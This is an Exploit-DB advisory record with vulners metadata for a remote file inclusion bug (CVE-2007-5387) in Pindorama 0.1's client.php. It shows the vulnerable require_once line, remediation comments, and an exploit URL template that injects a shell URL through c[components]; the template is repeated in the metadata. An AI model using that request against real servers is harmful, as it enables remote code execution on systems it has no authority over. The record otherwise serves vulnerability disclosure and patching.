ID EDB-ID:4519
Type exploitdb
Reporter S.W.A.T.
Modified 2007-10-11T00:00:00
Description
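Pindorama 0.1 client.php Remote File Inclusion Vulnerability (CVE-2007-5387). Webapps exploit for the PHP platform. The affected script is active/components/xmlrpc/client.php, which uses the c[components] request parameter as the prefix of an include path.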
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Pindorama 0.1
Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
// Root cause (CVE-2007-5387): the prefix of the include path comes from $c["components"].
// The CVE entry states that a URL passed in the c[components] request parameter reaches
// this call, so PHP loads and executes code from a location chosen by the requester.
// NOTE(review): presumably client.php does not set $c itself when requested directly and
// the array is populated from the request (register_globals-style) — confirm against the
// Pindorama 0.1 source.
// Remediation: build the path from a constant defined by the application, never from
// request data; deny direct web access to component scripts; keep allow_url_include and
// register_globals disabled in php.ini.
require_once($c["components"]."xmlrpc/common.php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-11]
{"bulletinFamily": "exploit", "id": "EDB-ID:4519", "cvelist": ["CVE-2007-5387"], "modified": "2007-10-11T00:00:00", "lastseen": "2016-01-31T21:07:17", "edition": 1, "sourceData": " \\\\\\|///\n \\\\ - - // Xmors Underground Group\n ( @ @ )\n \n ----oOOo--(_)-oOOo--------------------------------------------------\n Portal : Pindorama 0.1\n Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip\n\t Author : S.W.A.T.\n\t HomePage : wWw.XmorS.CoM\n\t Type : Remote File Inclusion\n Y! ID : Svvateam\n E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com\n Dork : :( \n \n ----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n\n\n+---------------------------------------------------------------------------------------------+\n\nVuln Code :\n\nrequire_once($c[\"components\"].\"xmlrpc/common.php\");\n\n+---------------------------------------------------------------------------------------------+\n+---------------------------------------------------------------------------------------------+\n\nExploit :\n\nhttp://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]\n\n\n+---------------------------------------------------------------------------------------------+\n\n# milw0rm.com [2007-10-11]\n", "published": "2007-10-11T00:00:00", "href": "https://www.exploit-db.com/exploits/4519/", "osvdbidlist": ["37879"], "reporter": "S.W.A.T.", "hash": "76390cc018806bab2a0d3562be12d70d33c937651f9aad3096c07c0ba149fbb3", "title": "Pindorama 0.1 client.php Remote File Inclusion Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Pindorama 0.1 client.php Remote File Inclusion Vulnerability. CVE-2007-5387. 
Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4519/", "viewCount": 1, "enchantments": {"vulnersScore": 5.0}}
{"result": {"cve": [{"id": "CVE-2007-5387", "type": "cve", "title": "CVE-2007-5387", "description": "PHP remote file inclusion vulnerability in active/components/xmlrpc/client.php in Pindorama 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the c[components] parameter.", "published": "2007-10-12T06:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5387", "cvelist": ["CVE-2007-5387"], "lastseen": "2017-09-29T14:25:33"}], "canvas": [{"id": "PINDORAMA_INCLUDE", "type": "canvas", "title": "Immunity Canvas: PINDORAMA_INCLUDE", "description": "**Name**| pindorama_include \n---|--- \n**CVE**| CVE-2007-5387 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| pindorama remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: pindorama \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5387 \nCVE Name: CVE-2007-5387 \n\n", "published": "2007-10-12T06:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/pindorama_include", "cvelist": ["CVE-2007-5387"], "lastseen": "2016-09-25T14:13:09"}], "osvdb": [{"id": "OSVDB:37879", "type": "osvdb", "title": "Pindorama client.php c[components] Variable Remote File Inclusion", "description": "## Manual Testing Notes\nhttp://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]\n## References:\nISS X-Force ID: 37179\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4519\n[CVE-2007-5387](https://vulners.com/cve/CVE-2007-5387)\nBugtraq ID: 26026\n", "published": "2007-10-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:37879", "cvelist": ["CVE-2007-5387"], 
"lastseen": "2017-04-28T13:20:33"}]}}